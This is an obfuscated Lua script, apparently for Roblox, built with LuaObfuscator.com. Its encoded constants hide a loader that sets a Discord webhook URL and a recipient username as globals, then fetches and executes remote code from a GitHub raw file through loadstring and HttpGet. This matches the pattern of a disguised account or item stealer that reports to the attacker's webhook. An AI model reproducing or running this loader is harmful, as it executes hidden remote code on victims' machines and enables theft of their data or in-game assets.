--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v96=v5(v83,v19);v19=nil;return v96;else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((929 -((1484 -(226 + 1044)) + 713))^(v32-(1 + 0))))%((5 -3)^(((v33-(2 -(4 -3))) -(v32-(1 -0))) + ((1755 -(32 + 85)) -(1523 + 114)))) ;return v84-(v84%(2 -1)) ;else local v85=(621 -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v85 + v85))>=v85) and (1 -0)) or (568 -(367 + 201)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==1) then return (v37 * (251 + 5)) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (959 -(892 + 65)) ;v35=(4 -2) -1 ;end end end local function v23()local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * (12338840 + 4438376)) + (v41 * (260471 -194935)) + (v40 * (1208 -(802 + (1147 -(915 + 82))))) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (5 -2) );v18=v18 + 4 ;v38=1 + 0 ;end end end local function v24()local v43=v23();local v44=v23();local v45=2 -1 ;local v46=(v20(v44,1 + (438 -(145 + 293)) ,26 -6 ) * (((1619 -(44 + 386)) -(1069 + 118))^(72 -40))) + v43 ;local v47=v20(v44,45 -24 ,31);local v48=((v20(v44,6 + 26 )==1) and  -(1 -0)) or (1 + 0) ;if (v47==(791 -(368 + 423))) then if (v46==0) then return v48 * 0 ;else v47=3 -2 ;v45=18 -(10 + 8) ;end elseif (v47==(3533 -(998 + 488))) then return ((v46==(0 -0)) and (v48 * (((141 + 302) -(416 + 26))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(440 + 583) ) * (v45 + (v46/((3 -1)^52))) ;end local function v25(v49)local v50=859 -(814 + 45) ;local v51;local v52;while true do if (v50==((2 -1) + 0)) then v51=v3(v16,v18,(v18 + v49) -(773 -(201 + 571)) );v18=v18 + v49 ;v50=2;end if (v50==((62 + 1078) -(116 + 1022))) then v52={};for v88=4 -3 , #v51 do v52[v88]=v2(v1(v3(v51,v88,v88)));end v50=2 + 1 ;end if (v50==0) then v51=nil;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=3 -2 ;end if (v50==3) then return v6(v52);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0 + 0 ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(0 + 0)) then v54=0;v55=nil;v53=2 -1 ;end if (v53~=(11 -7)) then else while true do if (v54==(0 + 0)) then v55=1024 -(706 + 318) ;v56=nil;v54=1252 -(721 + 530) ;end if (v54~=(1273 -(945 + 326))) then else v59=nil;v60=nil;v54=7 -4 ;end if (v54==(3 + 0)) then v61=nil;while true do local v97=856 -(564 + 292) ;local v98;local v99;while true do if (v97==0) then v98=700 -(271 + 429) ;v99=nil;v97=1 -0 ;end if (v97==(2 -1)) then while true do if ((304 -(244 + 60))~=v98) then else v99=0 + 0 ;while true do if (v99~=(1500 -(1408 + 92))) then else local v138=1001 -(938 + 63) ;local v139;while true do if ((0 + 0)==v138) then v139=1086 -(461 + 625) ;while true do if (v139==(1126 -(936 + 189))) then v99=1289 -(993 + 295) ;break;end if (v139==0) then local v155=0 + 0 ;while true do if (0==v155) then if (v55==1) then local v158=0;local v159;while true do if (v158==(1171 -(418 + 753))) then v159=0 + 0 ;while true do if (v159~=(0 + 0)) then else local v162=0 + 0 ;local v163;while true do if (v162~=(0 + 0)) then else v163=529 -(406 + 123) ;while true do if (v163~=(1614 -(1565 + 48))) then else v159=1;break;end if (v163~=(1769 -(1749 + 20))) then else local v168=0;while true do if (v168==0) then v60=v23();v61={};v168=1;end if (v168==(1 + 0)) then v163=1323 -(1249 + 73) ;break;end end end end break;end end end if (v159==2) then v55=269 -(176 + 91) ;break;end if (v159==1) then local v164=0 + 0 ;local v165;while true do if (v164~=(1145 -(466 + 679))) then else v165=0 -0 ;while true do if (v165~=(1092 -(975 + 117))) then else for v171=1,v60 do local v172=0 -0 ;local v173;local v174;local v175;local v176;while true do if (v172==1) then local v177=0 -0 ;while true do if ((1875 -(157 + 1718))==v177) then v175=nil;v176=nil;v177=1901 -(106 + 1794) ;end if (v177~=(3 -2)) then else v172=1 + 1 ;break;end end end if (v172==(0 + 0)) then v173=0 -0 ;v174=nil;v172=2 -1 ;end if (v172==(1020 -(697 + 321))) then while true do if (v173==(115 -(4 + 110))) then v176=nil;while true do if (v174==0) then local v187=0;local v188;while true do if (v187~=(584 -(57 + 527))) then else v188=0;while true do if (v188~=(2 -1)) then else v174=1;break;end if (v188~=(1427 -(41 + 1386))) then else v175=v21();v176=nil;v188=104 -(17 + 86) ;end end break;end end end if (v174~=1) then else if (v175==(1 + 0)) then v176=v21()~=(0 -0) ;elseif (v175==2) then v176=v24();elseif (v175~=(8 -5)) then else v176=v25();end v61[v171]=v176;break;end end break;end if (v173==0) then local v185=0;while true do if (v185==(1 -0)) then v173=1;break;end if (v185==0) then v174=0 -0 ;v175=nil;v185=167 -(122 + 44) ;end end end end break;end end end v59[3]=v21();v165=612 -(602 + 9) ;end if (v165~=1) then else v159=1191 -(449 + 740) ;break;end end break;end end end end break;end end end if (v55==2) then local v160=0 -0 ;while true do local v161=0 -0 ;while true do if (v161~=(947 -(245 + 702))) then else if (v160==(1 + 0)) then return v59;end if (v160~=0) then else local v166=0 + 0 ;local v167;while true do if (v166==(1898 -(260 + 1638))) then v167=0;while true do if (v167==(0 + 0)) then local v170=0 -0 ;while true do if (v170==0) then for v178=66 -(30 + 35) ,v23() do local v179=0 + 0 ;local v180;local v181;local v182;while true do if (v179==(0 + 0)) then local v186=1257 -(1043 + 214) ;while true do if (v186~=1) then else v179=3 -2 ;break;end if (v186~=(1212 -(323 + 889))) then else v180=0 -0 ;v181=nil;v186=2 -1 ;end end end if (v179~=1) then else v182=nil;while true do if (v180==0) then v181=0 + 0 ;v182=nil;v180=581 -(361 + 219) ;end if ((321 -(53 + 267))==v180) then while true do if (0==v181) then v182=v21();if (v20(v182,684 -(483 + 200) ,1464 -(1404 + 59) )==(0 + 0)) then local v190=0 -0 ;local v191;local v192;local v193;local v194;while true do if (v190~=(767 -(468 + 297))) then else while true do if (v191==(565 -(334 + 228))) then if (v20(v193,10 -7 ,416 -(15 + 398) )==1) then v194[6 -2 ]=v61[v194[986 -(18 + 964) ]];end v56[v178]=v194;break;end if (v191~=(236 -(141 + 95))) then else local v196=0 -0 ;local v197;while true do if (v196~=0) then else v197=0 + 0 ;while true do if (v197~=(0 + 0)) then else local v206=0;while true do if (v206~=1) then else v197=851 -(20 + 830) ;break;end if (v206==0) then v192=v20(v182,2,3 + 0 );v193=v20(v182,130 -(116 + 10) ,1 + 5 );v206=2 -1 ;end end end if (v197==1) then v191=739 -(542 + 196) ;break;end end break;end end end if (v191~=2) then else if (v20(v193,2 -1 ,1 -0 )==(1 + 0)) then v194[2]=v61[v194[2 + 0 ]];end if (v20(v193,2 -0 ,2 + 0 )==(1 + 0)) then v194[2 + 1 ]=v61[v194[3]];end v191=2 + 1 ;end if (v191~=(1 -0)) then else local v198=0 -0 ;local v199;while true do if ((0 -0)~=v198) then else v199=1551 -(1126 + 425) ;while true do if (v199==(0 + 0)) then local v207=0 -0 ;while true do if (v207==(406 -(118 + 287))) then v199=3 -2 ;break;end if (v207==(1121 -(118 + 1003))) then v194={v22(),v22(),nil,nil};if (v192==(977 -(553 + 424))) then local v208=0;local v209;while true do if (v208==0) then v209=0;while true do if (v209==(1790 -(573 + 1217))) then v194[5 -2 ]=v22();v194[4 + 0 ]=v22();break;end end break;end end elseif (v192==(2 -1)) then v194[3]=v23();elseif (v192==(2 + 0)) then v194[3]=v23() -((1 + 1)^16) ;elseif (v192==(4 -1)) then local v214=939 -(714 + 225) ;local v215;while true do if (v214~=0) then else v215=0;while true do if (v215==(0 + 0)) then v194[2 + 1 ]=v23() -((2 + 0)^(34 -18)) ;v194[1 + 3 ]=v22();break;end end break;end end end v207=2 -1 ;end end end if (v199==1) then v191=4 -2 ;break;end end break;end end end end break;end if ((1 + 0)==v190) then v193=nil;v194=nil;v190=50 -(25 + 23) ;end if ((0 -0)~=v190) then else v191=0;v192=nil;v190=754 -(239 + 514) ;end end end break;end end break;end end break;end end end for v183=1 + 0 ,v23() do v57[v183-(1330 -(797 + 532)) ]=v28();end v170=1;end if (v170==1) then v167=1 + 0 ;break;end end end if (v167==(1 + 0)) then v160=2 -1 ;break;end end break;end end end break;end end end end v155=1203 -(373 + 829) ;end if (v155==(732 -(476 + 255))) then v139=1;break;end end end end break;end end end if (v99==(1131 -(369 + 761))) then if (v55~=(0 -0)) then else local v144=97 -(11 + 86) ;local v145;while true do if (v144==(0 -0)) then v145=0 + 0 ;while true do if (v145==1) then local v156=0 -0 ;while true do if (v156~=(0 -0)) then else v58={};v59={v56,v57,nil,v58};v156=217 -(42 + 174) ;end if (v156==(1 + 0)) then v145=2 + 0 ;break;end end end if ((1 + 1)~=v145) then else v55=1505 -(363 + 1141) ;break;end if (v145==(1580 -(1183 + 397))) then local v157=0 + 0 ;while true do if ((1062 -(810 + 251))==v157) then v145=2 -1 ;break;end if (v157==(0 + 0)) then v56={};v57={};v157=1;end end end end break;end end end break;end end break;end end break;end end end break;end if (v54~=1) then else v57=nil;v58=nil;v54=1 + 1 ;end end break;end if (v53==3) then v60=nil;v61=nil;v53=3 + 1 ;end if (v53==(1977 -(1913 + 62))) then v58=nil;v59=nil;v53=536 -(43 + 490) ;end if (v53==(734 -(711 + 22))) then v56=nil;v57=nil;v53=7 -5 ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v87=0;while true do if (v87==1) then if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81==0) then v78[v80[2]]=v80[3];else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=2) then v78[v80[2]]=v64[v80[3]];elseif (v81>3) then v78[v80[2]][v80[3]]=v80[4];else v72=v80[3];end elseif (v81<=7) then if (v81<=5) then v78[v80[2]]=v80[3]~=0 ;elseif (v81==6) then v78[v80[2]]();else v78[v80[2]][v80[3]]=v80[4];end elseif (v81<=8) then v78[v80[2]]=v80[3];elseif (v81==9) then v78[v80[2]]();else local v121=0;local v122;local v123;local v124;local v125;while true do if (v121==2) then for v152=v122,v73 do v125=v125 + 1 ;v78[v152]=v123[v125];end break;end if (v121==1) then v73=(v124 + v122) -1 ;v125=0;v121=2;end if (v121==0) then v122=v80[2];v123,v124=v71(v78[v122](v13(v78,v122 + 1 ,v80[3])));v121=1;end end end elseif (v81<=15) then if (v81<=12) then if (v81>11) then local v108=v80[2];v78[v108]=v78[v108](v13(v78,v108 + 1 ,v73));elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=13) then v72=v80[3];elseif (v81>14) then do return;end else local v127=v80[2];local v128,v129=v71(v78[v127](v13(v78,v127 + 1 ,v80[3])));v73=(v129 + v127) -1 ;local v130=0;for v140=v127,v73 do v130=v130 + 1 ;v78[v140]=v128[v130];end end elseif (v81<=18) then if (v81<=16) then local v111=v80[2];local v112=v78[v80[3]];v78[v111 + 1 ]=v112;v78[v111]=v112[v80[4]];elseif (v81>17) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else local v131=v80[2];v78[v131]=v78[v131](v13(v78,v131 + 1 ,v73));end elseif (v81<=19) then do return;end elseif (v81==20) then v78[v80[2]]=v64[v80[3]];else local v135=0;local v136;local v137;while true do if (v135==1) then v78[v136 + 1 ]=v137;v78[v136]=v137[v80[4]];break;end if (v135==0) then v136=v80[2];v137=v78[v80[3]];v135=1;end end end v72=v72 + 1 ;break;end if (v87==0) then v80=v68[v72];v81=v80[1];v87=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O312O32353132363831392O382O30363031382F355F6D737035652D545F7A305F6E2O4448707A4352532O4F685447674C664745326554732O5675416C68656836793679356D425462673644686445633949457964463236030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030C3O004875736B794D34676971756503093O00557365724E616D653200173O0012083O00013O0026123O000E000100020004033O000E0001001214000100033O003004000100040005001214000100063O001214000200073O002010000200020008001208000400094O0001000500014O000A000200054O001100013O00022O00090001000100010004033O001600010026123O0001000100010004033O00010001001214000100033O0030040001000A000B001214000100033O0030040001000C000B0012083O00023O0004033O000100012O00133O00017O00",v9(),...);end
